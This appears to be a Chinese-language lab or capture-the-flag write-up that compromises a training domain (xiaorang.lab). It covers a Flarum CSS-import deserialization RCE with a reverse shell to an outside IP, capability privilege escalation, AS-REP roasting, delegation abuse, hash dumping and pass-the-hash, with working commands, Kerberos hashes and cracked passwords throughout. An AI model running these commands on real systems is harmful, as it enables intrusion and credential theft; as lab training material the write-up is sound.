公网(入口,172.22.60.52)
根据提示是弱密码。然后搓个脚本rockyou跑一下。
[email protected] : 1chris
接着是一个后台css RCE。参考如下:
使用phpggc生成一段弹shell命令:
./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/156.238.233.10/11456 0>&1'"
导入后台自定义样式:
@import (inline) 'data:text/css;base64,xxxx'; 检查一下assets/forum.css 有没有导入我们的内容。如果导入了就可以继续了。
再修改一次,就会触发反序列化,从而执行rce。
.test {
content: data-uri('phar://./assets/forum.css');
}拿到shell发现是低权限。一个一个试,suid不行,capability提权可以。
getcap -r / 2>/dev/null
openssl可以任意读,于是直接openssl
openssl enc -in "/root/flag/flag01.txt"
信息搜集(一层内网)
DC是flag4, 最后打, Fileserver是flag3,PC1应该是最先打的。
PC1(172.22.60.15) + Fileserver (172.22.60.42)
注意到flaurm后台可以看到很多用户+邮箱。/var/www/html/config.php 有密码
用navicat生成一个代理连上去
导出
AS-REP Roasting
GetNPUsers.py -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile flarum_users.txt但是这个email字段他加了个双引号怎么搞都是错的。改回来就行。
能找到几个用户。
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:1ea6970e8cf3bfe57ba54568bbb28db0$acb1fbf722122a7d5ac94594e6d24d669c814522bec5493f006f5627aa3bae6d21666bb17a0ffbc32441f064f767d5e1736db791864abcc68889d379d07262271ccd615de0ff1fa7f59e5adf38ce563128e64e4254264345e796b1d8dea97c26ca6b7e3c961303c50b3b6d7a4fff06ef666d7e872e809b27f1396237ed2e5f518bdfc31bae9af9ad1f0887b876a371f8ec86d68ce143386ecd1636a74b66be7eeaf447c29010f680964e147ef12a4032e430a9206e0acf6f74587f4c5279de95eca7e768dec551b6fdca6ea8c8344d594c380214c99260c9b9e6fc4a5ac986a5416c37f6a542b7505608bd16
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:7dcd047169d87b2855b97eef845dcf98$a9763910c3917a264edeae5b4c0b2ca57c91b6d5e9743b8571eb4dcbddb85532b389f2b228144a004728fd4149bc363fc6395af76570034cfaa100fab8dae18d0874b7105f62c68eec8dfa1c0c1d7ddc23a314cc8a4678240613e01629b3ca6c9eaaae8115cc04aca38c9de5c657832ba64387a858514255b0d92c837d741268869c2ad667a4ead5c55c6401f2b24764ab103e6cef63bf27ce589987e7a1ef60069fa87826ee5201339dd01606ab7916a69d582c8c830dfc913b15c7030f0dcb44dd02673066ce1f013fb4d601842bbdadf44a3db034510b746ac08a7a2552e591c0f48b7bf48d96a64d1494hashcat跑一下。
[email protected]::Adm12geC
rdp链上桌面有个xshell。但是版本过期了打不开。
用工具
[email protected]::admin4qwY38cc
本地/etc/hosts改一下,用bloodhound-python收集信息。
proxychains4 -q bloodhound-python -u zhangxin -p admin4qwY38cc -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp
这里可以发现zhangxin是account operators权限组的,所以可以通过它拿到域内除域控以外所有机器的system权限
参考下面这篇打委派攻击。
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount evailpc -Password $(ConvertTo-SecureString "password" -AsPlainText -Force)
import-module .\PowerView.ps1
Get-DomainComputer evailpc | select objectSid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1117)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer FILESERVER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Get-DomainComputer PC1 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose然后GetST,登录。可以拿到file server和pc1的flag。
proxychains4 -q getST.py -dc-ip 172.22.60.8 xiaorang.lab/evailpc$:password -spn cifs/fileserver.xiaorang.lab -impersonate administrator
export KRB5CCNAME=administrator@cifs_fileserver.xiaorang.lab@XIAORANG.LAB.ccache
proxychains4 -q smbexec.py -no-pass -k fileserver.xiaorang.labproxychains4 -q getST.py -dc-ip 172.22.60.8 xiaorang.lab/evailpc$:password -spn cifs/fileserver.xiaorang.lab -impersonate administrator
export KRB5CCNAME=administrator@cifs_PC1.xiaorang.lab@XIAORANG.LAB.ccache
proxychains4 -q smbexec.py -no-pass -k PC1.xiaorang.labDC(172.22.60.8)
在Fileserver上,可以用secretsdump抓hash。
proxychains4 -q secretsdump.py -k -no-pass fileserver.xiaorang.lab -dc-ip 172.22.60.8XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::然后再pth到DC,也可以抓
proxychains4 -q secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user AdministratorAdministrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683
Administrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9
Administrator:des-cbc-md5:f72a9889a18cc408然后就域控了,直接pth即可
proxychains4 -q wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/Administrator@172.22.60.15 -codec gbk耗时2小时12分钟44秒